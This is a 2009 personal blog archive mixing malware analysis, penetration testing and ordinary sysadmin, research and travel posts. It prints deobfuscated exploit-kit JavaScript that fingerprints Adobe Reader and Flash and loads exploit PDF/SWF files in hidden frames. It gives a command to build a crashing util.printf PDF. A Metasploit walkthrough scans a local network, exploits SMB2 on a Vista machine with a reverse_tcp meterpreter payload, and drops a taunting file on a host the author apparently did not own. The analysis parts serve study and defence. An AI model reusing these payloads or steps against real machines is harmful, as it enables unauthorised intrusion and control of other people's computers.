Sunday, November 15, 2009

Javascript lastmodified technique

Today I found a website that was said to host the Fragus botnet exploit kit.

After reviewing the page source code, it turns out to be using the ‘lastmodified’ technique to make the deobfuscation process harder. (Read here)

var jkmtu='',
uokyez=false,
jnuwx=String,
ehjnpy=jnuwx['f4r4o4mECPh4a9rPCLo4dLeL'.replace(/[LE49P]/g,'')],
btkz=window,
cflr=1,
bdfgou=btkz['eBvBajl0'.replace(/[0BGj2]/g,'')],
abhknx=document,
rwjzp=abhknx.lastModified,
chopqw=new Date(rwjzp).toUTCString(),
chopqw=chopqw.split(" "),
abmnxy=chopqw[4].split(":"),
acqtu="97"+abmnxy[2],
cmuwy=0,
...


By checking the HTTP response headers, we can take the Last-Modified date and put it into the variable for further analysis.
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 15 Nov 2009 18:00:39 GMT
Content-Type: text/html; charset=WINDOWS-1251
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 12 Dec 2008 11:11:35 GMT

Replace the variable with the value of the Last-Modified date, and edit the script so that the spidermonkey js interpreter can run it and print the output:

window = print;
document = print;
var jkmtu='',
uokyez=false,
jnuwx=String,
ehjnpy=jnuwx['f4r4o4mECPh4a9rPCLo4dLeL'.replace(/[LE49P]/g,'')],
btkz=window,
cflr=1,
bdfgou=btkz['eBvBajl0'.replace(/[0BGj2]/g,'')],
abhknx=document,
rwjzp="Fri, 12 Dec 2008 11:11:35 GMT",
chopqw=new Date(rwjzp).toUTCString(),
chopqw=chopqw.split(" "),
abmnxy=chopqw[4].split(":"),
acqtu="97"+abmnxy[2],
cmuwy=0,
...
...
...
print(ajkq);
};

bcfknv();
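The substitution above can be scripted. The following is an added example, not code from the kit or from the original post: it pulls Last-Modified out of captured response headers, reproduces the value the loader fragment derives from it, and pins the header into the script. The function names are assumptions; the headers and the script fragment are the ones shown in the post.

```python
import json
import re
from datetime import timezone
from email.utils import format_datetime, parsedate_to_datetime

# Response headers as shown in the post (abridged).
RAW_HEADERS = """\
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 15 Nov 2009 18:00:39 GMT
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 12 Dec 2008 11:11:35 GMT
"""

# The lines of the obfuscated loader that touch lastModified (from the post).
LOADER_FRAGMENT = """\
abhknx=document,
rwjzp=abhknx.lastModified,
chopqw=new Date(rwjzp).toUTCString(),
chopqw=chopqw.split(" "),
abmnxy=chopqw[4].split(":"),
acqtu="97"+abmnxy[2],
"""

# Any "<identifier>.lastModified" read, whatever the alias of document is called.
LAST_MODIFIED_READ = re.compile(r"\b[A-Za-z_][\w$]*\.lastModified\b")


def last_modified(raw_headers):
    """Return the Last-Modified header value, or None if the server sent none."""
    for line in raw_headers.splitlines()[1:]:  # skip the status line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "last-modified":
            return value.strip()
    return None


def derived_value(header_value):
    """Mirror the fragment: toUTCString() -> field 4 (time) -> seconds -> "97" + ss."""
    dt = parsedate_to_datetime(header_value).astimezone(timezone.utc)
    utc_string = format_datetime(dt, usegmt=True)  # same layout as JS toUTCString()
    seconds = utc_string.split(" ")[4].split(":")[2]
    return "97" + seconds


def pin_last_modified(script, header_value):
    """Replace every lastModified read with the captured header as a JS string literal."""
    if header_value is None:
        raise ValueError("no Last-Modified header captured; the script cannot be pinned")
    literal = json.dumps(header_value)
    return LAST_MODIFIED_READ.sub(lambda m: literal, script)


if __name__ == "__main__":
    value = last_modified(RAW_HEADERS)
    print("Last-Modified:", value)
    print("value built by the fragment:", derived_value(value))
    print(pin_last_modified(LOADER_FRAGMENT, value))
```

In the fragment shown, the derived value depends only on the seconds field of the header, so the response headers have to be captured together with the page body for the analysis to reproduce.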

And now we are ready to decode the JavaScript with the spidermonkey js interpreter. Below is the output:
function cfmqsy(){}

function jloqy(){
var ijqstv=false;
if(navigator.plugins && navigator.plugins.length){
for(var bfntv=0;bfntv < navigator.plugins.length;bfntv++){
if(navigator.plugins[bfntv].description.indexOf('Adobe Acrobat')!=-1){
ijqstv=true;
break;
}

if(navigator.plugins[bfntv].description.indexOf('Adobe PDF')!=-1){
ijqstv=true;
break;
}
}
}

else if(window.ActiveXObject){
var kyzvnb=null;

try{
kyzvnb=new ActiveXObject('AcroPDF.PDF');
} catch(e){}

if(!kyzvnb){
try{
kyzvnb=new ActiveXObject('PDF.PdfCtrl');
}
catch(e){}
}

if(kyzvnb){ijqstv=true;}
}

if(ijqstv){
var ua=navigator.userAgent.toLowerCase();
if(ua.indexOf("firefox")!=-1){
var fjwx=document.createElement('embed');
fjwx.width='1';
fjwx.height='1';
fjwx.src='./egilrw.pdf';
fjwx.type='application/pdf';
document.body.appendChild(fjwx);
}
else{
var fjwx=document.createElement('iframe');
fjwx.setAttribute('src','./egilrw.pdf');
fjwx.setAttribute('width',10);
fjwx.setAttribute('height',10);
fjwx.setAttribute('style','display:none;');
document.body.appendChild(fjwx);
}

...
...
...

function opvy(){
var PlayerVersion=[0,0,0];
if(navigator.plugins && navigator.mimeTypes.length){
var x=navigator.plugins["Shockwave Flash"];

if(x && x.description){
PlayerVersion=x.description.replace(/([a-zA-Z]|\s)+/,"").replace(/(\s+r|\s+b[0-9]+)/,".").split(".");
}
}

else{
try{
var fv=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");
if(fv!=null){
PlayerVersion = fv.GetVariable("\$version").split(" ")[1].split(",");
}
} catch(e){abhmry();return;
}
}

var version1=PlayerVersion[0]!=null?parseInt(PlayerVersion[0]):0;
var version2=PlayerVersion[1]!=null?parseInt(PlayerVersion[1]):0;
var version3=PlayerVersion[2]!=null?parseInt(PlayerVersion[2]):0;

if(version1==9 && version3 < 124){
var ua=navigator.userAgent.toLowerCase();

if(ua.indexOf("firefox")!=-1){
var swfelement=document.createElement('embed');
document.body.appendChild(swfelement);
swfelement.width='1';
swfelement.height='1';
swfelement.src='./manual.swf';
swfelement.type='application/x-shockwave-flash';

...
...
...

}

jloqy();

From the code, we can identify that it tries to attack vulnerabilities in Adobe Reader and Flash.

I downloaded the malicious PDF file that they push when a user visits the site. Gonna take a look at it later.

Saturday, November 14, 2009

Analyzing malicious PDF

Maybe some of you have read about malicious PDFs and the danger of neglecting the possibility that they can harm you in some way.

So today, let’s say you have caught a suspicious PDF file in the wild and you don’t really know what to do.



The first questions that arise are, “Does it contain malicious content?” and, if yes, “What will it try to do, and how?”.
Now the first thing that we normally do is to look into the PDF content structure and check for any hints. A PDF file follows a defined structure that makes up a PDF document. In this case, we’re going to use ‘cat’.



Alright, everything seems normal except the unreadable content between ‘stream’ and ‘endstream’. We cannot yet determine whether this unreadable content is malicious or just ordinary content for a PDF document. However, searching for the keyword ‘/Filter’ tells us that the unreadable content is encoded with FlateDecode. Most normal PDF files have some of their content encoded with FlateDecode, or with other encodings such as JBIG2Decode and DCTDecode. FlateDecode can usually be decoded using pdf-parser or inflater.



It turns out that the decoded content is JavaScript code that is obfuscated with Base64 encoding. At this point the PDF file has drawn some attention, as it shows signs that the code might contain shellcode. Now we’ll dump the JavaScript snippet into a new text file for further analysis.

Next, we’ll use spidermonkey to interpret the JavaScript code and generate the output shellcode.



Having gone this far, we can be sure that this PDF contains malicious content, and we can also identify what it tries to do and how. From this shellcode, we can see that it tries to exploit the util.printf vulnerability (CVE-2008-2992) in Adobe Reader 8.1.2 and below. If it succeeds, it will execute the payload contained within the unescape() function.

Our next (and possibly last) point of attention is the payload itself. It is a string of UTF16/UCS2 characters which can be converted to hex or into a binary executable file. s2b.py can do that job.



From the hexdump output, we’re able to see that there is a URL of potential malware that will be triggered when the exploitation succeeds.
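The triage steps in this post (find the FlateDecode streams, inflate them, turn the %u-escaped payload into bytes and look for strings) can be scripted as follows. This is an added example, not the tooling used in the post (pdf-parser, s2b.py); the sample PDF object, the script text and the URL in it are constructed and inert, and the function names are assumptions.

```python
import re
import zlib

# "N G obj << dictionary >> stream ... endstream", without crossing an endobj.
STREAM_RE = re.compile(
    rb"obj\s*<<((?:(?!endobj).)*?)>>\s*stream\r?\n(.*?)\r?\nendstream", re.S)
# unescape("...") whose argument consists only of %uXXXX units.
UNESCAPE_RE = re.compile(r'''unescape\(\s*(["'])((?:%u[0-9A-Fa-f]{4})+)\1\s*\)''')
PRINTABLE_RE = re.compile(rb"[\x20-\x7e]{6,}")

SAMPLE_URL = "http://payload.example.invalid/load.php"  # constructed placeholder


def normalise_names(dictionary):
    """Undo #xx escapes in PDF names, so /Fl#61teDecode compares as /FlateDecode."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), dictionary)


def inflate(body):
    """Inflate a stream body; fall back to a partial decode if it is truncated."""
    try:
        return zlib.decompress(body)
    except zlib.error:
        try:
            return zlib.decompressobj().decompress(body)
        except zlib.error:
            return None  # not zlib data at all


def inflate_streams(pdf_bytes):
    """Return the decoded bytes of every /FlateDecode stream object."""
    decoded = []
    for match in STREAM_RE.finditer(pdf_bytes):
        if b"/FlateDecode" not in normalise_names(match.group(1)):
            continue
        data = inflate(match.group(2))
        if data is not None:
            decoded.append(data)
    return decoded


def percent_u_to_bytes(escaped):
    """Convert %uXXXX units to the byte sequence they represent (UTF-16LE order)."""
    out = bytearray()
    for unit in re.findall(r"%u([0-9A-Fa-f]{4})", escaped):
        out += int(unit, 16).to_bytes(2, "little")
    return bytes(out)


def ascii_strings(data):
    """Printable ASCII runs of six or more bytes, as a hexdump reader would spot them."""
    return [run.decode("ascii") for run in PRINTABLE_RE.findall(data)]


def triage(pdf_bytes):
    """Strings found in every unescape() payload of every inflated stream."""
    findings = []
    for decoded in inflate_streams(pdf_bytes):
        for match in UNESCAPE_RE.finditer(decoded.decode("latin-1")):
            findings += ascii_strings(percent_u_to_bytes(match.group(2)))
    return findings


def build_sample():
    """Constructed, inert sample: one FlateDecode stream holding script text."""
    data = SAMPLE_URL.encode("ascii")
    data += b"\x00" * (2 - len(data) % 2)  # pad to whole UTF-16 units
    escaped = "".join(f"%u{data[i + 1]:02x}{data[i]:02x}"
                      for i in range(0, len(data), 2))
    script = f'var payload = unescape("{escaped}");'
    stream = zlib.compress(script.encode("ascii"))
    head = (b"%PDF-1.4\n5 0 obj\n<< /Length " + str(len(stream)).encode()
            + b" /Filter /Fl#61teDecode >>\nstream\n")
    return head + stream + b"\nendstream\nendobj\n"


if __name__ == "__main__":
    for found in triage(build_sample()):
        print(found)
```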

Friday, October 16, 2009

Updating Firefox 3.5 Flash Player in Ubuntu

This is just for my future reference in case I forget about it again.

I tried to view the dashboard on the Snorby demo page. Sadly, the wonderful graph did not show up. I checked my Flash plugin; it was a default installation of version 9.0. So I decided to check for the latest version on the Adobe site, and it is already at version 10.0.32.18.

So I downloaded the Adobe Flash .deb package and installed it:
sudo dpkg -i install_flash_player_10_linux.deb

I restarted Firefox, and it still detected my Shockwave Flash as version 9.
So here is the trick for it:
sudo mv /usr/lib/swfdec-mozilla/libswfdecmozilla.so /usr/lib/swfdec-mozilla/libswfdecmozilla.old
sudo cp /usr/lib/adobe-flashplugin/libflashplayer.so /usr/lib/swfdec-mozilla/libswfdecmozilla.so
sudo cp /usr/lib/adobe-flashplugin/libflashplayer.so /usr/lib/firefox/plugins/

Restart your Firefox, and check about:plugins

Wednesday, October 14, 2009

PDF Structure + embedded JavaScript

Recently, I’ve been studying the PDF structure and how it can be a platform to distribute malware to users and infect them. All I can say is that it is made possible through vulnerabilities in JavaScript handling. As my friend quoted from Didier Stevens, “PDF + JS = OMG”.

Actually, Didier Stevens has come out with a tool that allows you to create a PDF file and embed JavaScript code into it. It is a nice tool which allows us to learn about the structure of a PDF file and how JavaScript code is embedded into it. Have a look at it here.

Example PDF file that’ll crash Adobe Reader 8.1.2 on XP SP2:
$ python make-pdf-javascript.py -j "util.printf('%5000f', 0.0);" donotopen.pdf



From here, with a complete JavaScript code to do heapspray and execute shellcode, the PDF file is ready to get to the user and infect the computer.

GNU Screen rawks!

I’d always heard about screen but never had an interest in reading about it and trying it. That was until recently, when a friend of mine used it, and the way he manages his terminal with screen got my attention.

For a person who works a lot with terminal-based systems, screen can be quite a handy application for me to work with. With one terminal emulator running screen, I can edit code, run IRC, connect over SSH, read a log, etc. I can detach and reattach the screen. If I accidentally close the terminal emulator, all I need to do is open it again and resume my previously closed screen in the same state.


To start getting to know screen (for those who have never installed it), run this command:
sudo apt-get install screen
and
man screen

Other references you might want to look at:

http://www.kuro5hin.org/story/2004/3/9/16838/14935
http://jmcpherson.org/screen.html
http://aperiodic.net/screen/

Tuesday, October 6, 2009

Testing the new smb2 exploit

Recently I downloaded the Metasploit Framework 3.3 and tested the new unpatched smb2 exploit on my local network ;-D.

Run the metasploit framework console
[email protected] $ ./msfconsole

Scan the network for hosts that have smb2 enabled
msf > use auxiliary/scanner/smb/
msf auxiliary(smb2) > set RHOSTS 192.168.1.1-192.168.1.254
RHOSTS => 192.168.1.1-192.168.1.254
msf auxiliary(smb2) > set THREADS 100
THREADS => 100
msf auxiliary(smb2) > run

[*] 192.168.1.10 supports SMB 2 [dialect 2.2] and has been online for 21 hours
[*] 192.168.1.15 supports SMB 2 [dialect 2.2] and has been online for 43 hours
[*] 192.168.1.111 supports SMB 2 [dialect 2.2] and has been online for 30 hours
[*] 192.168.1.121 supports SMB 2 [dialect 2.2] and has been online for 80 hours
[*] 192.168.1.123 supports SMB 2 [dialect 255.2] and has been online for 10 hours
[*] 192.168.1.197 supports SMB 2 [dialect 255.2] and has been online for 8 hours

Quite a result! Now check the Windows version of the selected IP
msf exploit(smb2_negotiate_func_index) > use auxiliary/scanner/smb/version
msf auxiliary(version) > set RHOSTS 192.168.1.15
RHOSTS => 192.168.1.15
msf auxiliary(version) > run

[*] 192.168.1.15 is running Windows Vista Ultimate Service Pack 1 (language: Unknown)
[*] Auxiliary module execution completed

It is Windows Vista. Now we’ll run the exploit against that IP
msf auxiliary(version) > use exploit/windows/smb/smb2_negotiate_func_index
msf exploit(smb2_negotiate_func_index) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(smb2_negotiate_func_index) > set LHOST 192.168.1.46
LHOST => 192.168.1.46
msf exploit(smb2_negotiate_func_index) > set LPORT 5678
LPORT => 5678
msf exploit(smb2_negotiate_func_index) > set RHOST 192.168.1.15
RHOST => 192.168.1.15
msf exploit(smb2_negotiate_func_index) > exploit

[*] Connecting to the target (192.168.1.15:445)…
[*] Started reverse handler
[*] Sending the exploit packet (854 bytes)…
[*] Waiting up to 180 seconds for exploit to trigger…
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.1.46:5678 -> 192.168.1.15:52010)

Succeeded! Now I’ve got access to the computer. That gives me full control of the computer
meterpreter > sysinfo
Computer: GREEN
OS : Windows Vista (Build 6001, Service Pack 1).
Arch : x86
Language: ms_MY
meterpreter > execute -f cmd.exe -c -H -i

Process 636896 created.
Channel 2 created.
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.

C:\>echo PLEASE DISABLE YOUR SMB2, OR I’LL RETURN > PLEASE DISABLE YOUR SMB2.txt

It is quite a dangerous situation when people are able to get into your computer without you knowing about it. And to make it worse, they can get your personal files/folders or spy on you.

If you’re connected to a public wired/wireless network (Starbucks, Old Town, or a lab), the recommended solution for the time being is to disable SMB2. You can get Microsoft’s released fix for disabling SMB2 here.

Don’t be ignorant or you’ll be in trouble.

Thursday, October 1, 2009

Accessing MySQL database from outside localhost

When I install or use an application that needs a MySQL database, it is mostly accessed from localhost, for example by the Apache server, etc. That is much more convenient and easy to configure.

However, as my project requires a dedicated, centralized database server, and the application resides on another server, I have to configure the application and MySQL to allow connections from outside localhost. As we all know, by default MySQL only allows connections from within localhost.

So here’s the solution for this case:

Edit your /etc/mysql/my.cnf and change the bind address:
$ sudo vim /etc/mysql/my.cnf

Find the word ‘bind-address’ and change 127.0.0.1 to your IP.

Then log in to the mysql console:
$ mysql -uroot -pYOURROOTPASSWORD
mysql> GRANT ALL PRIVILEGES ON *.* TO [email protected] IDENTIFIED BY "PASSWORD";
mysql> FLUSH PRIVILEGES;
mysql> exit
Now you can access your database from outside localhost:
$ mysql -uUSERNAME -pPASSWORD -h MYSQL_SERVER_IP

Wednesday, September 30, 2009

Exploit published for SMB2 vulnerability in Windows

Good news! (I guess.) Fully functional exploit code for the (still unpatched) Windows SMB v2 vulnerability has been published to the public via the Metasploit Framework. It can be used to discover and attack vulnerable Windows machines remotely.

You can read more here, here and here

Wednesday, September 9, 2009

Keyboard layout problem in VMware Server 2

Recently I installed VMware Server 2, which is needed for some of my projects. I was very excited and looked forward to installing an OS in it. However, on my first OS installation, I noticed that the keyboard layout was wrong. I had no choice but to abort the installation and find a solution to that problem.

After some searching, I found out that I need to add something to the VMware configuration file.

For my future reference, here is the solution:
$ sudo vim /etc/vmware/config

and add this line to the config file:
xkeymap.nokeycodeMap = "TRUE"

Save, exit, and you’re done.

NOTE: You cannot redirect the output of the echo command into /etc/vmware/config with sudo, as you’ll end up getting Permission denied, unless you switch to root and run the echo command there. For example:
$ sudo su
# echo -e "xkeymap.nokeycodeMap = \"TRUE\"" >> /etc/vmware/config
# exit

Friday, September 4, 2009

Installing VMware Server 2 on Linux

Today I want to share the steps for installing VMware Server 2 on Ubuntu 9.04 (as a future reference, in case I forget how to install it later).

Before we start installing VMware Server 2, it is best to download the installation tarball first. You can download the VMware Server 2 tarball at http://www.vmware.com/products/server/.

On the VMware website, click “Download” and register your account. Once registration is complete, you will be redirected to the download page. Click “TAR image” for VMware Server 2 for Linux Operating Systems and download it.

While it is downloading, check your email to activate your account. This is to obtain the product license that will be used during installation.

Once the download and license activation are done, install the packages required before installing VMware Server 2:
$ sudo apt-get install linux-headers-`uname -r` build-essential xinetd

Then go to the directory containing the tarball you downloaded (in my case, /home/azizan), then extract and install the VMware package:
$ cd /home/azizan

$ tar xvfz VMware-server-*.tar.gz

$ cd vmware-server-distrib

$ sudo ./vmware-install.pl

During installation you will be asked several questions. If you are unsure how to answer, just press Enter (the default answer), except when asked for the name of the alternate administrator; enter your username there. For the directory in which to store virtual machines, you can use your home directory (in my case, /home/azizan/vm).

Near the end, you will be asked to enter the serial number for VMware Server 2. Enter the serial number you received when you activated your account.

Once the installation of VMware Server 2 is finished, you can use it through your favourite web browser by visiting the following address:
http://localhost:8222

Good luck!

Saturday, August 29, 2009

Apache.org hit by SSH key compromise

The open-source Apache Software Foundation pulled its Apache.org Web site offline for about three hours today because of a server hack caused by a compromised SSH key.

A brief message posted on the site made it clear the compromise was “not due to any software exploits in Apache itself”, but was actually caused by a compromised SSH key.

See the initial report from Apache.

Source: ZDnet

Monday, August 17, 2009

Learning to use SVN

Back when I was getting familiar with FreeBSD, I was told to learn to update ports using CVSup. Now I have been told to learn about SVN. It turns out these things serve more or less the same purpose, only with different functions and capabilities. CVSup, SVN and git all belong to one category, namely SCM, or Source Control Management.

These tools synchronize the application sources in our directory with those on the developer’s server. For development, they synchronize the sources we develop locally with the sources on the server (as an update, or in other words, a revision).

For anyone who wants to get familiar with SVN and learn its functions, capabilities and syntax, take the time to read about it here

Saturday, August 15, 2009

Redmine and SVN installation/configuration

Install all packages needed for redmine and svn:
$ sudo aptitude install ruby rubygems ruby1.8-dev libgemplugin-ruby libgemplugin-ruby1.8 \
mysql-server libruby-extras libruby1.8-extras rubygems1.8 rails \
subversion rake apache2-threaded-dev apache2 libapache-dbi-perl \
libapache2-mod-perl2 libdigest-sha1-perl libapache2-svn libdbd-mysql-perl
Install and configure redmine (version 0.8.4 at the time this tutorial was written; please refer to http://rubyforge.org/frs/?group_id=1850 for the latest version):
$ sudo mkdir /var/www/redmine
$ cd /var/www/redmine
$ sudo wget http://rubyforge.org/frs/download.php/56909/redmine-0.8.4.tar.gz
$ sudo tar xvfz redmine-0.8.4.tar.gz
$ sudo mv redmine-0.8.4/* . ; sudo rm -f redmine-0.8.4.tar.gz
$ sudo rm -rf redmine-0.8.4/
$ sudo chown www-data:www-data * . -R
Create MySQL database for redmine:
$ sudo mysql -uroot -p
mysql> create database redmine character set utf8;
Copy and edit file database.yml
$ sudo cp config/database.yml.example config/database.yml
$ sudo nano config/database.yml

EDIT:

production:
adapter: mysql
database: redmine
host: 127.0.0.1
username: your-mysql-username
password: your-mysql-password
encoding: utf8

Run the rake command for “production” setting:
$ sudo rake db:migrate RAILS_ENV="production"
$ sudo rake redmine:load_default_data RAILS_ENV="production"

Install passenger (aka mod_rails):
$ gem install passenger    # it’ll take a while
$ sudo /var/lib/gems/1.8/gems/passenger-2.2.4/bin/passenger-install-apache2-module

Create/Open and add the ‘LoadModule’ in /etc/apache2/mods-available/passenger.load:
$ sudo nano /etc/apache2/mods-available/passenger.load
LoadModule passenger_module /var/lib/gems/1.8/gems/passenger-2.2.4/ext/apache2/mod_passenger.so

Create/Open and add new module in /etc/apache2/mods-available/passenger.conf:
$ sudo nano /etc/apache2/mods-available/passenger.conf
PassengerRoot /var/lib/gems/1.8/gems/passenger-2.2.4
PassengerRuby /usr/bin/ruby1.8

Enable the passenger for apache module:
$ sudo a2enmod passenger

Copy the Redmine.pm file into the apache perl5 library:
$ sudo cp /var/www/redmine/extra/svn/Redmine.pm /usr/lib/perl5/Apache

Create and add the following in /etc/apache2/sites-available/redmine (you might need to change the bold text):
$ sudo nano /etc/apache2/sites-available/redmine
NameVirtualHost *

ServerName redmine.yourURL
DocumentRoot /var/www/redmine/public
ServerAdmin [email protected]
LogLevel warn
ErrorLog /var/log/apache2/redmine_error
CustomLog /var/log/apache2/redmine_access combined

Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all


Create and add the following in /etc/apache2/sites-available/svn (you might need to change the bold text):
$ sudo nano /etc/apache2/sites-available/svn
NameVirtualHost *
PerlLoadModule Apache::Redmine

ServerName svn.yourURL
ServerAdmin [email protected]
ErrorLog /var/log/apache2/svn_error
CustomLog /var/log/apache2/svn_access combined


DAV svn
SVNParentPath “/var/svn/”

AuthType Basic
AuthName redmine
Require valid-user

PerlAccessHandler Apache::Authn::Redmine::access_handler
PerlAuthenHandler Apache::Authn::Redmine::authen_handler

RedmineDSN DBI:mysql:database=redmine;host=localhost

RedmineDbUser mysql-user
RedmineDbPass mysql-password


Restart the Apache Server:
$ sudo /etc/init.d/apache2 restart

Create svn root repository directory and set the permission:
$ sudo mkdir /var/svn
$ sudo chmod 0755 /var/svn

Configure Apache to serve the svn repositories through DAV:
$ sudo a2enmod dav
$ sudo a2enmod dav_svn
$ sudo a2enmod perl
$ sudo a2ensite svn
$ sudo /etc/init.d/apache2 reload

Edit the Apache sites-enabled:
$ cd /etc/apache2/sites-enabled
$ sudo rm 000-default
$ sudo ln -s ../sites-available/redmine 000-redmine
$ sudo /etc/init.d/apache2 reload

Now let’s get the redmine server up:
$ sudo ruby /var/www/redmine/script/server -e production

Done! Now you can go to the redmine page through this address
http://redmine:3000/

NOTE: You can put the repository creation script into a cron job so that it checks the Redmine projects on a schedule and creates repositories accordingly.
$ sudo nano /etc/cron.d/redmine

and put this line into it
10 * * * * root ruby /var/www/redmine/extra/svn/reposman.rb --redmine redmine.yourURL --svn-dir /var/svn --owner www-data --url http://svn.yourURL/ >> /var/log/reposman.log

References:
  1. http://lordsauron.wordpress.com/2008/12/10/redmine-08x-installation-tutorial/
  2. http://wiki.ousli.org/index.php/RedmineUbuntu
  3. http://blog.itsmine.co.uk/2009/01/22/howto-install-subversion-and-redmine-on-centos5-rhel5/

Thursday, July 30, 2009

Python: Sort List and return Index of original Unsorted Item

I’ve been staying up all night to revise my research paper, which is going to be submitted as the final submission for the IEEE Symposium on Industrial Electronics and Applications (ISIEA 09).

Most of the night was spent working with the Python code to make a comparison based on the test data and training data-set, to be included as the result findings in the paper.

One problem occurred when I wanted to sort the list of result data but still keep the original unsorted index for future reference. After some searching and asking, several solutions to this problem were found.
  1. build a mapping from values to the original index before sorting the list
  2. build a list of (value, index) pairs and sort that list instead of the original array list
  3. don’t sort at all, just sort a copy
  4. sorted(enumerate(arrayname), key=operator.itemgetter(1))
and I definitely chose the 4th solution, which does not need much work.

Below are the steps and output:
>>> myarray = [2, 3, 1, 4, 5]
>>> import operator
>>> sorted(enumerate(myarray), key=operator.itemgetter(1))
[(2, 1), (0, 2), (1, 3), (3, 4), (4, 5)]

Saturday, June 20, 2009

To Bagan Datoh

Recently my friends and I went to Bagan Datoh, Perak, with the intention of visiting a mosque that was built almost 150 years ago.

The purpose of this visit was to see and study the heritage and architecture left behind by the ulama of the Nusantara of earlier times, in which every carving, structure and design of the mosque carries an implicit meaning and very deep values of divinity. From what we saw, most of the mosque’s interior structure still retains its original construction, such as the main pillars (tiang seri), the ceiling, and the mimbar area. Wood carvings reciting the selawat upon the Prophet are still clearly visible at the mimbar, along with Nusantara-style patterns that reflect the creativity of the Malay community of long ago.



Looking up at the mosque’s ceiling, one sees the uniqueness of the ceiling structure, which forms tiers of squares bordered by khat (calligraphy) carvings all around, giving a strange yet calm feeling; perhaps this is also caused by the light reflected onto the glass panes around the ceiling.

Overall, the experience of performing iktikaf in the mosque gave a very calming feeling, alongside the peaceful village atmosphere, far from the nuances of arrogance and savagery of humankind at large. However, for me, still like a small child, all the meanings and values implicit in every corner of the mosque cannot yet be understood one by one. I could only take in the calm and peace that envelops the mosque.

Saturday, May 2, 2009

Two unforgettable weeks in Indonesia

Today, my friends and I arrived in Malaysia after travelling in Indonesia for 2 weeks. It was a journey that gave me so many great experiences in terms of religion, culture, lifestyle, and more.

The mission of our journey was to visit every tomb of the Wali Songo, mosques and other historical places in order to learn about the spread of Islam in the Nusantara region. The journey started in Bandung, where our host, Kak Ain, managed to get us accommodated around Universitas Padjadjaran so that we could settle down and plan our travel. From there, we headed to Cirebon and Demak to visit Keraton Kasepohan, Makam Sunan Gunung Jati, Makam Sunan Kali Jaga and Masjid Agung Demak. My impression of those places is indescribable. I’ve never seen such places, with unique Islamic structures and scenery, and so full of culture.

Along the journey, we also visited Makam Sunan Kudus, Sunan Ampel and Sunan Drajat, all the way to Surabaya. We continued our journey to Yogyakarta to visit Balai Kajian dan Pengembangan Budaya Melayu (BKPBM). At BKPBM, we got a warm welcome from all of the editors there, and had a deep discussion and knowledge-sharing session about Malay culture and civilization from their research and perspective as well as ours (read more about this here). Our cultural and historical trip ended there, and we wrapped up our night in Yogyakarta with some food-hunting and sightseeing around Kota Malioboro.



From Yogyakarta, we headed back to Bandung with the unforgettable memories that we picked up along the way. Thinking back, apart from the adventure of exploring the land of Java, I really appreciate the knowledge and experience I gained from each and every place I visited, from its language and dialect, culture and lifestyle, to its food. It has opened my eyes to a new perspective on Malay history and civilization.

Saturday, April 18, 2009

Wrapping up the FYP

It is a full relief. After 3.5 months of aggressive usage of mind, my partner and I presented our FYP project yesterday. It was a mixed feeling of nervousness and confidence. The 3.5 months of work were evaluated in around 30 minutes.

To be frank, the presentation did not go as well as I expected. I stumbled a lot, forgot some points and yada yada. But in general, we are fully satisfied with the overall experience and skills that we got from the project. We learned a lot of new knowledge within that period, not to forget some memories from the detection and data collection process.



At the time we proposed the project, we didn't know whether we could get this thing to work, but in the end we managed to see it function as we programmed it to. k-Nearest Neighbor rocks!

To wrap up this Final Year Project, I would like to express my deepest appreciation to the persons listed below:
  • My Family
  • My Supervisor, Dr. Teddy Mantoro
  • My Partner, Salahudin
  • My Friends, you know who you are =)
Thank you. Without you all, I might not have been able to complete my project.

Wednesday, February 25, 2009

Mechanism to measure WiFi signals

For my Final Year Project progress, I need to measure the signals produced by the Wi-Fi access points in the Kulliyyah of ICT.

For Wi-Fi access points, there are three (3) signals that can be measured and taken into account for my FYP research: (a) Signal Strength, (b) Signal Quality, and (c) Signal Noise. What matters right now is the mechanism to measure those signals and save them as the experiment data.

After a bit of research, I found out that Linux has an application, called iwlist, that can scan the signal strength, quality and noise of the access points.

This application (iwlist) scans and retrieves information about the access points, such as the MAC Address, Signal Strength, Signal Quality, Signal Noise, etc. What actually matters to my project are the Signal Strength, Signal Quality and Signal Noise of the access points.

From here, I then modified the source code of the built-in iwlist in Linux to make it smaller and standalone. Next, I developed another script that integrates with iwlist to process the output and save the information in a database-like form for later retrieval and calculation.

I might need several days to finish developing this measurement mechanism. hmmm.

Friday, February 20, 2009

Final Year Project progress

Tracking Indoor Symbolic Location Using IEEE 802.11 Signals in Location-Aware Computing is the topic that my partner and I have chosen to work on for our final year project.

Our supervisor, who specializes in this area (pervasive and ubiquitous computing), guided us in selecting this topic and has given us tremendous inspiration about its future development.

So, back to the project topic: what is this project all about? Basically, we are going to conduct a study and develop a system which will determine the user’s location based on Wi-Fi signals.


Several access points along a corridor will produce a unique set of signals at each point. From this uniqueness, the user’s location can be determined. Based on the diagram above, we can see that there are 3 access points on a corridor, and 4 location points where the user might be standing. So, at each of points 1, 2, 3, and 4, the signal strengths of the 3 access points will be different. Below is some mock data:

Point 1
  • Signal strength AP1: -20
  • Signal strength AP2: -65
  • Signal strength AP3: -83

Point 2
  • Signal strength AP1: -45
  • Signal strength AP2: -32
  • Signal strength AP3: -69

Point 3
  • Signal strength AP1: -89
  • Signal strength AP2: -57
  • Signal strength AP3: -36

Point 4
  • Signal strength AP1: -93
  • Signal strength AP2: -67
  • Signal strength AP3: -21

Basically, we need to develop an application to scan the signal strength of all existing access points on the corridor and use it as the training data-set, and also an application to validate the data-set collected.
